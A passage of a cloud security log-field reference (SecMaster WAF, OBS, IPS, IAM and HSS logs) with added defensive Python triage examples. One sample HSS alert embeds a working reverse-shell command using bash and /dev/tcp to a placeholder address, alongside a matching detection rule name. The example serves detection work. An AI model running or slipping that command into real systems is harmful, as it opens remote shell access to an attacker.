Log Fields
If you access WAF, HSS, CFW, CTS, and IPS logs through the console, SecMaster adds information such as log sources and timestamps to these logs in the form of key-value pairs.
This section describes the meaning of each field.
- Common Fields: describes common fields.
- sec-waf-attack: describes the fields in WAF attack logs.
- sec-waf-access: describes the fields in WAF access logs.
- sec-obs-access: describes the fields in OBS access logs.
- sec-nip-attack: describes the fields in IPS attack logs.
- sec-iam-audit: describes the fields in IAM audit logs.
- sec-hss-vul: describes the fields in the HSS host vulnerability scan result.
- sec-hss-alarm: describes the fields in the HSS host security alerts.
- sec-hss-log: describes the fields in the HSS host security logs.
- sec-ddos-attack: describes the fields in the DDoS attack logs.
- sec-cts-audit: describes the fields in the CTS logs.
- sec-cfw-risk: describes the fields in the CFW attack incident logs.
- sec-cfw-flow: describes the fields in the CFW traffic logs.
- sec-cfw-block: describes the fields in the CFW access control logs.
- sec-apig-access: describes the fields in the API Gateway access logs.
- sec-dbss-alarm: describes the fields in the DBSS alert logs.
- sec-dsc-alarm: describes the fields in the DSC alert logs.
Common Fields

Fields written as [src_/dest_]name exist in both a src_ form and a dest_ form (for example, src_geo.ip and dest_geo.ip), describing the source and the destination of the logged activity respectively.

Parameter | Field Type | Description
---|---|---
__time | Date | Time when the log is generated
__raw | String | Raw log
ops.source | String | Data source
ops.rgn | String | Site
ops.csvc | String | Data source (cloud service)
ops.ver | String | Data warehouse version
ops.hash | String | Hash of the original log, used for integrity verification
[src_/dest_]asset.domain.id | String | Domain ID
[src_/dest_]asset.domain.name | String | Domain name
[src_/dest_]asset.id | String | Asset ID
[src_/dest_]asset.name | String | Asset name
[src_/dest_]asset.type | String | Asset type
[src_/dest_]asset.region | String | Asset site
[src_/dest_]geo.ip | String | IP address
[src_/dest_]geo.country | String | Country name (Chinese)
[src_/dest_]geo.prov | String | Province name (Chinese)
[src_/dest_]geo.city | String | City name (Chinese)
[src_/dest_]geo.org | String | Organization that registered the IP address
[src_/dest_]geo.isp | String | Carrier
[src_/dest_]geo.loc.lat | Float | Latitude
[src_/dest_]geo.loc.lon | Float | Longitude
[src_/dest_]geo.tz | Integer | Time zone
[src_/dest_]geo.utc_off | Integer | Time zone (UTC offset)
[src_/dest_]geo.cac | String | Time zone
[src_/dest_]geo.iddc | String | International call prefix code
[src_/dest_]geo.cc | String | Country code (ISO)
[src_/dest_]geo.contc | String | Continental code (ISO)
[src_/dest_]geo.idc | String | Data center (equipment room)
[src_/dest_]geo.bs | String | Mobile base station
[src_/dest_]geo.cc3 | String | Country code (3 digits)
[src_/dest_]geo.euro | String | EU member state
sec-waf-attack

Fields in WAF attack logs

Field | Type | Description
---|---|---
category | String | Category. The value is attack.
time | Date | Log time.
time_iso8601 | Date | ISO 8601 time of the log.
policy_id | String | Protection policy ID.
level | Integer | Protection policy level. The value can be 1 (loose), 2 (medium), or 3 (strict).
attack | String | Attack type. The value can be:
action | String | Processing action. The value can be:
rule | String | ID of the triggered rule or the description of the custom policy type.
sub_type | String | Crawler subtype. Required (cannot be left blank) when attack is robot.
location | String | Location of the triggered payload.
resp_headers | String | Response header.
resp_body | String | Response body.
hit_data | String | Triggered payload string.
status | String | Status code of the response to the request.
reqid | String | Random ID.
id | String | Attack ID.
method | String | Request method.
sip | String | Request IP address of the client.
sport | String | Request port of the client.
host | String | Domain name of the requested server.
http_host | String | Port number of the requested server.
uri | String | Request URL.
header | String | Request header information.
mutipart | String | Request multipart header (file upload).
cookie | String | Request cookie.
params | String | Parameters following the request URI.
body_bytes_sent | String | Total number of bytes of the response body sent to the client.
upstream_response_time | String | Response time of the backend server.
process_time | String | Detection duration of the engine.
engine_id | String | Unique ID of the engine.
group_id | String | Log group ID used for interconnecting with LTS.
attack_stream_id | String | ID of the log stream in the log group identified by group_id.
hostid | String | ID of a protected domain name.
tenantid | String | Tenant ID of the protected domain name.
projectid | String | Project ID of the protected domain name.
backend | Object | Address of the backend server to which the request is forwarded. Its sub-fields are listed in the next table.

Fields in backend

Field | Type | Description
---|---|---
type | String | Backend host type (IP address or domain name).
alive | String | Backend host status.
host | String | Backend host value.
protocol | String | Backend protocol.
port | Integer | Backend port.
sec-waf-access

Table 3 describes the fields in WAF access logs.

Field | Type | Description
---|---|---
requestid | String | Random ID
time | Date | Log time
eng_ip | String | Engine IP address
hostid | String | ID of a protected domain name
tenantid | String | Tenant ID of the protected domain name
projectid | String | Project ID of the protected domain name
remote_ip | String | IP address of the client that sends the request
scheme | String | Request protocol type
response_code | String | Response code of a request
method | String | Request method
http_host | String | Domain name of the requested server
url | String | Request URL
request_length | String | Request length
bytes_send | String | Total number of bytes sent to the client
body_bytes_sent | String | Total number of bytes of the response body sent to the client
upstream_addr | String | IP address of the selected backend server
request_time | String | Request processing time, measured from the first byte received from the client
upstream_response_time | String | Response time of the backend server
upstream_status | String | Response code of the backend server
upstream_connect_time | String | Time taken to connect to the backend server
upstream_header_time | String | Time until the first byte of the response header is received from the backend server
bind_ip | String | Back-to-origin (retrieval) IP address of the engine
engine_id | String | Unique ID of the engine
time_iso8601 | Date | ISO 8601 time of the log
sni | String | Domain name requested through SNI
tls_version | String | Version of the protocol used to establish the SSL/TLS connection
ssl_curves | String | List of curves supported by the client
ssl_session_reused | String | Whether the SSL session was reused
process_time | String | Detection duration of the engine
x_forwarded_for | String | Content of the X-Forwarded-For request header (client-supplied, so only trustworthy when set by a trusted proxy in front of WAF)
cdn_src_ip | String | Content of the Cdn-Src-Ip request header
x_real_ip | String | Content of the X-Real-Ip request header
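The access-log fields above are enough to build a small triage routine. The following is an added example, not SecMaster or WAF code: it parses constructed log records that use the sec-waf-access field names, resolves the real client address (trusting cdn_src_ip only when remote_ip belongs to an assumed CDN range, because X-Forwarded-For, X-Real-Ip and Cdn-Src-Ip are otherwise attacker-controlled), counts 401/403 bursts per client, and flags requests negotiated with old TLS versions. The proxy range, the failure threshold and the weak-TLS list are assumptions for the demonstration.

```python
"""Triage over SecMaster-normalized WAF access logs (sec-waf-access fields).

Added example, not SecMaster or WAF code. The log lines are constructed to
match the field names in the table above; the trusted proxy range, the
failure threshold and the weak-TLS list are assumptions for the demo.
"""
import ipaddress
import json
from collections import Counter

# Assumption: egress range of the CDN/proxy tier that legitimately sets
# Cdn-Src-Ip. Only requests arriving from it get their client address taken
# from that header; everything else uses remote_ip, because the forwarded
# headers are attacker-controlled when no trusted hop is in front of WAF.
TRUSTED_PROXY_NETS = [ipaddress.ip_network("203.0.113.0/24")]
AUTH_FAILURE_CODES = {"401", "403"}
FAILURE_THRESHOLD = 3                # failures per client before alerting
WEAK_TLS = {"TLSv1", "TLSv1.1"}      # tls_version values worth flagging


def _entry(reqid, remote_ip, code, url, xff="", cdn="", tls="TLSv1.3", method="GET"):
    """Build one constructed log record with the sec-waf-access field names."""
    return json.dumps({
        "requestid": reqid, "time_iso8601": "2024-05-01T10:00:00+08:00",
        "remote_ip": remote_ip, "x_forwarded_for": xff, "cdn_src_ip": cdn,
        "x_real_ip": "", "method": method, "url": url,
        "response_code": code, "tls_version": tls,
    })


# Constructed sample: one client failing three logins while spoofing
# X-Forwarded-For, one request via the trusted CDN, one weak-TLS request.
SAMPLE_LINES = [
    _entry("r1", "198.51.100.7", "401", "/login", xff="10.0.0.1", method="POST"),
    _entry("r2", "198.51.100.7", "403", "/login", xff="10.0.0.1", method="POST"),
    _entry("r3", "198.51.100.7", "401", "/login", xff="10.0.0.1", method="POST"),
    _entry("r4", "203.0.113.5", "200", "/", xff="192.0.2.10", cdn="192.0.2.10"),
    _entry("r5", "192.0.2.44", "403", "/admin", tls="TLSv1.1"),
]


def parse_lines(lines):
    """Each SecMaster log record is a JSON object of key-value pairs."""
    return [json.loads(line) for line in lines]


def _is_trusted_proxy(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_PROXY_NETS)


def client_ip(entry):
    """Resolve the real client: trust cdn_src_ip only behind a known proxy."""
    remote = entry.get("remote_ip", "")
    cdn = entry.get("cdn_src_ip", "")
    if cdn and _is_trusted_proxy(remote):
        return cdn
    return remote


def triage(entries):
    """Return auth-failure bursts per client, weak-TLS requests, and requests
    carrying a client-set X-Forwarded-For that arrived from an untrusted hop."""
    failures = Counter()
    weak_tls, untrusted_xff = [], []
    for e in entries:
        if e.get("response_code") in AUTH_FAILURE_CODES:
            failures[client_ip(e)] += 1
        if e.get("tls_version") in WEAK_TLS:
            weak_tls.append(e["requestid"])
        if e.get("x_forwarded_for") and not _is_trusted_proxy(e.get("remote_ip", "")):
            untrusted_xff.append(e["requestid"])
    bursts = {ip: n for ip, n in failures.items() if n >= FAILURE_THRESHOLD}
    return {"auth_failure_bursts": bursts, "weak_tls": weak_tls,
            "untrusted_xff": untrusted_xff}


if __name__ == "__main__":
    print(json.dumps(triage(parse_lines(SAMPLE_LINES)), indent=2))
```

Keying the failure counter on client_ip() rather than on x_forwarded_for is the point: an attacker can put any value in X-Forwarded-For, so counting on it lets them spread one brute-force across arbitrary "clients" and stay under the threshold.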
sec-obs-access

Fields in OBS access logs

Field | Type | Description
---|---|---
srcip | String | Source IP address for accessing OBS.
srcport | String | Source port for accessing OBS.
logtime | Date | Time when the log is generated.
ces_log_version | String | Version number; V0 for an internal request. V0 does not record Cloud Eye audit logs, and V1 records Cloud Eye audit logs.
request_start_time | String | Request start time.
ctx_request_id | String | Request ID, which uniquely identifies a request for tracing.
request_method | String | Request method (GET/POST).
remote_ip | String | Remote address, in the format Client IP address:Port number.
operation | String | Operation type, for example, GET.OBJECT.
bucket_name | String | Bucket name.
object_name | String | Object name (file name).
query_string | String | Request query string.
http_status | String | HTTP status code, for example, 200.
content_length | String | Length of the requested content.
user_agent | String | Client agent.
storage_class | String | OBS storage class.
user_name | String | Username of the requester.
user_id | String | User ID of the requester.
domain_name | String | Domain name of the requester.
domain_id | String | Domain ID of the requester.
project_id | String | Project ID of the requester.
owner_domain_name | String | Tenant name of the bucket owner.
owner_domain_id | String | Tenant ID of the bucket owner.
owner_project_id | String | Project ID of the bucket owner.
transmission_type | String | Network type. The value can be:
scheme | String | Network protocol.
http_version | String | HTTP version.
host | String | OBS domain name.
port | String | Port number.
auth_v2_v4 | String | Authentication mode.
host_type | String | Access type.
x_forwarded_for | String | IP address of the proxy client.
pub_bkt | String | Whether the bucket is accessed anonymously.
pub_obj | String | Whether the object is accessed anonymously.
website_req | String | Whether the request is a website request.
crr_req | String | Whether the request is a cross-region replication (CRR) request.
huawei_cloud_service | String | Whether the request is a CDN request.
batch_delete_success_count | String | Number of objects successfully deleted in a batch deletion.
ctc_log_urn | String | Agency.
requester | String | Agency account.
is_over_write | String | Whether existing data is overwritten.
error_code | String | Error cause.
detail_error_code | String | Detailed error cause.
request_content_type | String | Request content type.
request_content_md5 | String | MD5 of the request content.
total_bytes_received | String | Total bytes of content received.
response_content_type | String | Response content type.
total_bytes_sent | String | Total bytes sent in the response header and response body.
referrer | String | Referring page.
index_read_count | String | Metadata table query latency.
persistence_read_count | String | Number of times that data is read.
vpc_id | String | ID of the VPC to which the requesting client belongs.
access_with_security_token | String | Whether access used a temporary security token (STS).
copy_size | String | Copy size.
vpcep_traffic | String | Whether the request was transmitted through a VPC endpoint (VPCEP).
access_key | String | Access key ID (AK) used for the request.
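The requester fields (domain_id, user_id) next to the owner fields (owner_domain_id) make OBS access logs useful for spotting anonymous and cross-tenant reads and large egress. The following is an added example, not OBS or SecMaster code: it classifies constructed records that use the sec-obs-access field names and totals successful GET.OBJECT bytes per requester. It assumes that an anonymous request carries an empty user_id and domain_id, and the egress threshold is arbitrary.

```python
"""Classify SecMaster-normalized OBS access logs (sec-obs-access fields).

Added example, not OBS or SecMaster code. The records are constructed to
match the field names in the table above. Assumptions: an anonymous
request carries an empty user_id and domain_id, and the egress threshold
is arbitrary.
"""
import json
from collections import Counter

EGRESS_THRESHOLD = 50 * 1024 * 1024   # assumed per-requester byte limit


def _record(rid, operation, status, domain_id, user_id, total_bytes_sent,
            srcip="192.0.2.1", bucket="finance-reports", owner="d-finance"):
    """One constructed log record using sec-obs-access field names."""
    return json.dumps({
        "ctx_request_id": rid, "operation": operation, "http_status": status,
        "bucket_name": bucket, "object_name": "q1.xlsx", "srcip": srcip,
        "domain_id": domain_id, "user_id": user_id, "owner_domain_id": owner,
        "total_bytes_sent": str(total_bytes_sent),
    })


# Constructed sample: owner read, anonymous bulk read, cross-tenant read,
# a denied attempt, and an owner write.
SAMPLE_LINES = [
    _record("o1", "GET.OBJECT", "200", "d-finance", "u-alice", 1024),
    _record("o2", "GET.OBJECT", "200", "", "", 60 * 1024 * 1024, srcip="198.51.100.9"),
    _record("o3", "GET.OBJECT", "200", "d-other", "u-mallory", 4096),
    _record("o4", "GET.OBJECT", "403", "d-other", "u-mallory", 0),
    _record("o5", "PUT.OBJECT", "200", "d-finance", "u-alice", 0),
]


def parse_lines(lines):
    return [json.loads(line) for line in lines]


def requester_key(entry):
    """Stable aggregation key: user_id, or the source IP for anonymous calls."""
    return entry.get("user_id") or f"anon:{entry.get('srcip', '?')}"


def classify(entry):
    """Tag one record: anonymous, cross_tenant (another domain succeeded
    against this bucket), or denied."""
    tags = set()
    status = entry.get("http_status", "")
    domain = entry.get("domain_id", "")
    if not entry.get("user_id") and not domain:
        tags.add("anonymous")
    if status == "403":
        tags.add("denied")
    elif domain and domain != entry.get("owner_domain_id") and status.startswith("2"):
        tags.add("cross_tenant")
    return tags


def egress_by_requester(entries):
    """Bytes served by successful object reads, per requester."""
    totals = Counter()
    for e in entries:
        if e.get("operation") == "GET.OBJECT" and e.get("http_status", "").startswith("2"):
            totals[requester_key(e)] += int(e.get("total_bytes_sent") or 0)
    return dict(totals)


def large_egress(entries):
    """Requesters whose successful reads exceed EGRESS_THRESHOLD."""
    return sorted(k for k, v in egress_by_requester(entries).items() if v >= EGRESS_THRESHOLD)


if __name__ == "__main__":
    parsed = parse_lines(SAMPLE_LINES)
    for e in parsed:
        print(e["ctx_request_id"], sorted(classify(e)))
    print(large_egress(parsed))
```

Denied requests are tagged separately and excluded from the egress total so that a burst of 403s from another tenant shows up as probing rather than as data loss.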
sec-nip-attack

Fields in IPS attack logs

Field | Type | Description
---|---|---
SyslogId | String | Log serial number (SN).
Vsys | String | Virtual system name.
Policy | String | Name of the security policy.
SrcIp | String | Source IP address of the packet.
DstIp | String | Destination IP address of the packet.
SrcPort | String | Source port of the packet. For an ICMP packet, the value is 0.
DstPort | String | Destination port of the packet. For an ICMP packet, the value is 0.
SrcZone | String | Source security zone of the packet.
DstZone | String | Destination security zone of the packet.
User | String | Username.
Protocol | String | Protocol of the packet matched by the signature.
Application | String | Application to which the packet matched by the signature belongs.
Profile | String | Name of the configuration profile.
SignName | String | Name of the signature.
SignId | String | ID of the signature.
EventNum | String | Number of merged log events. Whether logs are merged depends on the merge frequency and conditions; the value is 1 if logs are not merged.
Target | String | Object attacked by the packet matched by the signature. The value can be:
Severity | String | Severity of the attack caused by the packet matched by the signature. The value can be:
Os | String | OS attacked by the packet matched by the signature. The value can be:
Category | String | Threat type of the detected attack packet features.
Action | String | Signature action.
Reference | String | Reference information about the signature.
Extend | String | Evidence collection field in enhanced mode.
sec-iam-audit

Fields in IAM audit logs

Field | Type | Description
---|---|---
uid | String | User ID
un | String | Username
did | String | Domain ID
dn | String | Domain name
src | String | Request domain name
opl | String | Operation level
op | String | Operation type
res | String | IAM service invocation result
ter | String | Source IP address
dtl | String | IAM authentication details
tn | Date | Occurrence time
ts | Long | Timestamp when the IAM service is invoked
tid | String | Trace ID
evnt | String | Incident (event)
tobj | String | Service
sec-hss-vul

Fields in HSS vulnerability scanning results

Field | Type | Description
---|---|---
agentUuid | String | Agent UUID.
alarmCsn | String | Alert UUID, randomly generated when the master generates an alert.
alarmKey | String | Alert keyword. For an alert, it is the msg_id reported by the transparent transmission agent. For a vulnerability, it is generated by the master.
alarmVersion | String | Agent version.
occurTime | Int64 | Vulnerability detection time (ms).
severity | Int32 | Vulnerability level defined by HSS.
hostUuid | String | UUID of the affected host.
hostName | String | Name of the affected host.
hostIp | String | Communication IP address of the affected host.
ipList | String | List of IP addresses of the affected host.
cloudId | String | Cloud agent SN.
region | String | Region where the affected host is located.
projectId | String | ID of the affected tenant.
enterpriseProjectId | String | ID of the affected enterprise project.
appendInfo | Object | Vulnerability details. Its sub-fields are listed in the next table.

Fields in appendInfo

Field | Type | Description
---|---|---
vulId | String | Official vulnerability ID.
type | Int32 | Vulnerability type. The value can be:
repairNecessity | Int32 | Necessity level of fixing the vulnerability. The value can be:
status | Int32 | Reserved field.
cve_ids | String | Comma-separated list of CVE IDs.
url | String | URL of the official page with the vulnerability details.
vulNameEn | String | Vulnerability name in English.
vulNameCn | String | Vulnerability name in Chinese.
severityLevel | String | Vulnerability severity. The options are as follows:
descriptionEn | String | Vulnerability description in English.
descriptionCn | String | Vulnerability description in Chinese.
solutionEn | String | Solution description in English.
solutionCn | String | Solution description in Chinese.
repairCmd | String | Fix command.
needBoot | Int32 | Whether the system needs to be restarted. The default value is 1, which means no restart is needed.
errorInfo | String | Fix failure cause.
appName | String | Name of the software that has the vulnerability (Linux vulnerabilities only).
version | String | Version of the software that has the vulnerability (Linux vulnerabilities only).
createTime | Int64 | First detection time (ms).
updateTime | Int64 | Vulnerability fixing time (ms). The initial value is the same as createTime.
agentId | String | UUID of the associated host agent.
projectId | String | ID of the affected tenant.
sec-hss-alarm

Fields in HSS alert logs

Field | Type | Description
---|---|---
agentUuid | String | Agent UUID.
alarmCsn | String | Alert UUID.
alarmKey | String | Alert keyword. For an alert, it is the msg_id reported by the transparent transmission agent. For a vulnerability, it is generated by the master.
alarmVersion | String | Agent version.
occurTime | Long | Incident occurrence time (accurate to the millisecond).
severity | Long | Severity.
hostUuid | String | UUID of the affected host.
hostName | String | Name of the affected host.
hostIp | String | Communication IP address of the affected host.
ipList | String | List of IP addresses of the affected host.
cloudId | String | Cloud agent SN.
region | String | Region where the affected host is located.
projectId | String | ID of the affected tenant.
enterpriseProjectId | String | ID of the affected enterprise project.
appendInfo | Object | Alert details. Its sub-fields are listed in the next table.

Fields in appendInfo

Field | Type | Description
---|---|---
agent_id | String | Agent ID.
version | String | Incident version.
container_name | String | Container ID (in container security scenarios).
image_name | String | Image name (in container security scenarios).
event_id | String | Incident ID (GUID).
event_name | String | Incident name.
event_classid | String | Unique incident ID.
occur_time | Long | Occurrence time (accurate to the second).
recent_time | Long | Last occurrence time (accurate to the second).
event_category | Integer | Incident category.
event_type | Integer | Incident type.
event_count | Integer | Number of incidents.
severity | Integer | Severity.
attack_phase | Integer | Attack phase.
attack_tag | Integer | Attack tag.
confidence | Integer | Confidence.
action | Integer | Action.
detect_module | String | Detection module.
report_source | String | Report source.
related_events | String | Related incident ID.
resource_info | Object | Resource information (fields listed under resource_info below).
network_info | Object | Network information (fields listed under network_info below).
app_info | Object | Application information (fields listed under app_info below).
system_info | Object | System information (fields listed under system_info below).
process_info | List | Process information (fields listed under process_info below).
user_info | List | User information (fields listed under user_info below).
file_info | List | File information (fields listed under file_info below).
geo_info | Object | Geographic information (fields listed under geo_info below).
malware_info | Object | Malware information (fields listed under malware_info below).
forensic_info | String | Evidence collection field (fields listed under forensic_info below).
recommendation | String | Handling suggestions.
extend_info | String | Extended incident information (fields listed under extend_info below).

Fields in resource_info

Field | Type | Description
---|---|---
project_id | String | Project ID.
region_name | String | Region name.
vpc_id | String | VPC ID.
host_name | String | Host name.
host_ip | String | Host IP address.
host_id | String | Host ID (ECS ID).
cloud_id | String | Cloud agent SN.
vm_name | String | VM name.
vm_uuid | String | VM UUID.
container_id | String | Container ID.
image_id | String | Image ID.
sys_arch | String | System CPU architecture.
os_bit | String | OS bit version.
os_type | String | OS type.
os_name | String | OS name.
os_version | String | OS version.

Fields in network_info

Field | Type | Description
---|---|---
local_address | String | Local address.
local_port | Integer | Local port.
remote_address | String | Remote address.
remote_port | Integer | Remote port.
src_ip | String | Source IP address.
src_port | Integer | Source port.
src_domain | String | Source domain.
dest_ip | String | Destination IP address.
dest_port | Integer | Destination port.
dest_domain | String | Destination domain.
protocol | String | Protocol.
app_protocol | String | Application layer protocol.
flow_direction | String | Flow direction.

Fields in app_info

Field | Type | Description
---|---|---
sql | String | Executed SQL statement.
domain_name | String | DNS domain name.
url_path | String | URL.
url_method | String | URL method.
req_refer | String | URL request referrer.
email_subject | String | Email subject.
email_sender | String | Email sender.
email_receiver | String | Email recipient.
email_keyword | String | Email keyword.

Fields in process_info

Field | Type | Description
---|---|---
process_name | String | Process name.
process_path | String | Process file path.
process_pid | Integer | Process ID.
process_uid | Integer | Process user ID.
process_username | String | Process username.
process_cmdline | String | Process command line.
process_filename | String | Process file name.
process_start_time | Long | Process start time.
process_gid | Integer | Process group ID.
process_egid | Integer | Effective process group ID.
process_euid | Integer | Effective process user ID.
parent_process_name | String | Parent process name.
parent_process_path | String | Parent process file path.
parent_process_pid | Integer | Parent process ID.
parent_process_uid | Integer | Parent process user ID.
parent_process_cmdline | String | Parent process command line.
parent_process_filename | String | Parent process file name.
parent_process_start_time | Long | Parent process start time.
parent_process_gid | Integer | Parent process group ID.
parent_process_egid | Integer | Effective parent process group ID.
parent_process_euid | Integer | Effective parent process user ID.
child_process_name | String | Subprocess name.
child_process_path | String | Subprocess file path.
child_process_pid | Integer | Subprocess ID.
child_process_uid | Integer | Subprocess user ID.
child_process_cmdline | String | Subprocess command line.
child_process_filename | String | Subprocess file name.
child_process_start_time | Long | Subprocess start time.
child_process_gid | Integer | Subprocess group ID.
child_process_egid | Integer | Effective subprocess group ID.
child_process_euid | Integer | Effective subprocess user ID.
virt_cmd | String | Virtualization command.
virt_process_name | String | Virtualization process name.
escape mode | String | Escape mode.
escape cmd | String | Command executed after the escape.

Fields in user_info

Field | Type | Description
---|---|---
user_id | Integer | User ID.
user_gid | Integer | User GID.
user_name | String | Username.
user_group_name | String | User group name.
user_home_dir | String | User home directory.
login_ip | String | User login IP address.
service_type | String | Login service type.
service_port | Integer | Login service port.
login_mode | String | Login mode.
login_lasttime | Long | Last login time of the user.
login_fail_count | Integer | Number of failed login attempts.
pwd_hash | String | Password hash (sensitive; restrict access to logs that carry this field).
pwd_with_fuzzing | String | Anonymized password.
pwd_used_days | Integer | Password age (days).
pwd_min_days | Integer | Minimum password validity period.
pwd_max_days | Integer | Maximum password validity period.
pwd_warn_left_days | Integer | Advance warning of password expiration (days).

Fields in file_info

Field | Type | Description
---|---|---
file_path | String | File path/name.
file_alias | String | File alias.
file_size | Integer | File size.
file_mtime | Long | Time when the file was last modified.
file_atime | Long | Time when the file was last accessed.
file_ctime | Long | Time when the file status last changed.
file_hash | String | File hash value.
file_md5 | String | File MD5 value.
file_sha256 | String | File SHA-256 value.
file_type | String | File type.
file_content | String | File content.
file_attr | String | File attribute.
file_operation | String | File operation type.
file_change_attr | String | Old/new attribute.
file_new_path | String | New file path.
file_desc | String | File description.
file_key_word | String | File keyword.
is_dir | Boolean | Whether the file is a directory.
fd_info | String | File handle information.
fd_count | Integer | Number of file handles.

Fields in forensic_info

Field | Type | Description
---|---|---
monitor_process | String | Monitoring process.
escape_mode | String | Escape mode.
abnormal_port | String | Abnormal port.

Fields in geo_info

Field | Type | Description
---|---|---
src_country | String | Source country/region.
src_city | String | Source city.
src_latitude | Long | Source latitude.
src_longitude | Long | Source longitude.
dest_country | String | Destination country/region.
dest_city | String | Destination city.
dest_latitude | Long | Destination latitude.
dest_longitude | Long | Destination longitude.

Fields in malware_info

Field | Type | Description
---|---|---
malware_family | String | Malware family.
malware_class | String | Malware classification.

Fields in system_info

Field | Type | Description
---|---|---
pwd_valid | Boolean | Whether the password is valid.
pwd_min_len | Integer | Minimum password length.
pwd_digit_credit | Integer | Digits contained in the password.
pwd_uppercase_letter | Integer | Uppercase letters contained in the password.
pwd_lowercase_letter | Integer | Lowercase letters contained in the password.
pwd_special_characters | Integer | Special characters contained in the password.

Fields in extend_info

Field | Type | Description
---|---|---
hit_rule | String | Hit rule.
rule_name | String | Rule name.
rulesetname | String | Rule set name.
report_type | String | Reported data type.

Fields in ti_info

Field | Type | Description
---|---|---
ti_source | String | Intelligence source.
ti_class | String | Intelligence classification.
ti_threat_type | String | Intelligence threat type.
ti_first_time | Long | First detection time.
ti_last_time | Long | Last detection time.
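An HSS alert nests most of what an analyst needs under appendInfo: process lineage in process_info, the remote endpoint in network_info, file hashes in file_info, and rule and evidence details in extend_info and forensic_info. The following is an added example, not HSS or SecMaster code: it flattens a constructed alert built from the field names in the tables above into a single triage record, matches file_sha256 against an IOC list, and decodes forensic_info and extend_info. Those two fields are typed String in the table yet documented with sub-fields, so the example assumes they arrive JSON-encoded and tolerates the case where they do not. The hashes, hosts, addresses and the "shell as service user" heuristic are assumptions for the demonstration.

```python
"""Flatten a SecMaster-normalized HSS alert (sec-hss-alarm fields) for triage.

Added example, not HSS or SecMaster code. The alert below is constructed
using the field names from the tables above; hashes, hosts and addresses
are made up. Assumption: forensic_info and extend_info, which the table
types as String but documents with sub-fields, arrive JSON-encoded.
"""
import json

# Constructed alert: a web worker spawning a reverse shell.
SAMPLE_ALERT = {
    "agentUuid": "agent-0001", "alarmCsn": "csn-0001", "alarmVersion": "3.2.0",
    "occurTime": 1714557600000, "severity": 3,
    "hostUuid": "host-0001", "hostName": "web-01", "hostIp": "10.0.0.5",
    "appendInfo": {
        "event_id": "evt-0001", "event_name": "Reverse shell",
        "event_type": 1, "attack_phase": 5, "confidence": 90, "action": 0,
        "network_info": {"src_ip": "10.0.0.5", "src_port": 51234,
                         "dest_ip": "198.51.100.7", "dest_port": 4444,
                         "protocol": "tcp", "flow_direction": "out"},
        "process_info": [{
            "process_name": "bash", "process_path": "/usr/bin/bash",
            "process_pid": 4321, "process_uid": 33, "process_username": "www-data",
            "process_cmdline": "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1",
            "parent_process_name": "php-fpm", "parent_process_pid": 1200,
            "child_process_name": "",
        }],
        "file_info": [{"file_path": "/tmp/.x.sh", "file_size": 512,
                       "file_sha256": "3b2c" * 16}],
        "user_info": [{"user_id": 33, "user_name": "www-data", "login_ip": ""}],
        "forensic_info": json.dumps({"monitor_process": "bash",
                                     "escape_mode": "", "abnormal_port": "4444"}),
        "extend_info": json.dumps({"hit_rule": "rev_shell_dev_tcp",
                                   "rule_name": "Reverse shell via /dev/tcp"}),
    },
}

# Constructed IOC list (lower-case SHA-256 digests).
KNOWN_BAD_SHA256 = {"3b2c" * 16}


def _as_dict(value):
    """Decode the String-typed sub-objects; tolerate dicts and junk."""
    if isinstance(value, dict):
        return value
    if isinstance(value, str) and value:
        try:
            decoded = json.loads(value)
            return decoded if isinstance(decoded, dict) else {}
        except ValueError:
            return {}
    return {}


def process_lineage(alert):
    """'parent > process > child' strings, one per process_info entry."""
    chains = []
    for p in alert.get("appendInfo", {}).get("process_info", []) or []:
        names = [p.get("parent_process_name"), p.get("process_name"),
                 p.get("child_process_name")]
        chains.append(" > ".join(n for n in names if n))
    return chains


def match_iocs(alert, bad_sha256):
    """Paths of files whose file_sha256 is on the IOC list."""
    hits = []
    for f in alert.get("appendInfo", {}).get("file_info", []) or []:
        if (f.get("file_sha256") or "").lower() in bad_sha256:
            hits.append(f.get("file_path"))
    return hits


def summarize(alert, bad_sha256):
    """One flat dict an analyst (or a detection rule) can act on."""
    info = alert.get("appendInfo", {})
    net = info.get("network_info") or {}
    forensic = _as_dict(info.get("forensic_info"))
    extend = _as_dict(info.get("extend_info"))
    procs = info.get("process_info", []) or []
    return {
        "host": alert.get("hostName"),
        "event": info.get("event_name"),
        "rule": extend.get("hit_rule"),
        "lineage": process_lineage(alert),
        # Heuristic (assumption): a non-root service account spawning a shell.
        "shell_as_service_user": any(
            p.get("process_name") in {"bash", "sh", "dash"} and p.get("process_uid", 0) != 0
            for p in procs),
        "remote": f"{net['dest_ip']}:{net.get('dest_port')}" if net.get("dest_ip") else None,
        "abnormal_port": forensic.get("abnormal_port"),
        "container_escape": bool(forensic.get("escape_mode")),
        "ioc_hits": match_iocs(alert, bad_sha256),
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_ALERT, KNOWN_BAD_SHA256), indent=2))
```

process_info, user_info and file_info are lists, so every accessor above iterates rather than indexing element zero; an alert that correlates several processes or files would otherwise silently lose evidence.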
sec-hss-log

Fields in HSS security logs

Field | Type | Description
---|---|---
agentUuid | String | Agent UUID.
alarmCsn | String | Alert UUID.
alarmKey | String | Alert keyword. For an alert, it is the msg_id reported by the transparent transmission agent. For a vulnerability, it is generated by the master.
alarmVersion | String | Agent version.
occurTime | Long | Incident occurrence time (accurate to the millisecond).
severity | Long | Severity.
hostUuid | String | UUID of the affected host.
hostName | String | Name of the affected host.
hostIp | String | Communication IP address of the affected host.
ipList | String | List of IP addresses of the affected host.
cloudId | String | Cloud agent SN.
region | String | Region where the affected host is located.
projectId | String | ID of the affected tenant.
enterpriseProjectId | String | ID of the affected enterprise project.
appendInfo | Object | Alert details. Its sub-fields are listed in the next table.

Fields in appendInfo

Field | Type | Description
---|---|---
agent_id | String | Agent ID.
version | String | Incident version.
container_name | String | Container ID (in container security scenarios).
image_name | String | Image name (in container security scenarios).
event_id | String | Incident ID (GUID).
event_name | String | Incident name.
event_classid | String | Unique incident ID.
occur_time | Long | Occurrence time (accurate to the second).
recent_time | Long | Last occurrence time (accurate to the second).
event_category | Integer | Incident category.
event_type | Integer | Incident type.
event_count | Integer | Number of incidents.
severity | Integer | Severity.
attack_phase | Integer | Attack phase.
attack_tag | Integer | Attack tag.
confidence | Integer | Confidence.
action | Integer | Action.
detect_module | String | Detection module.
report_source | String | Report source.
related_events | String | Related incident ID.
resource_info | Object | Resource information (fields listed under resource_info below).
network_info | Object | Network information (fields listed under network_info below).
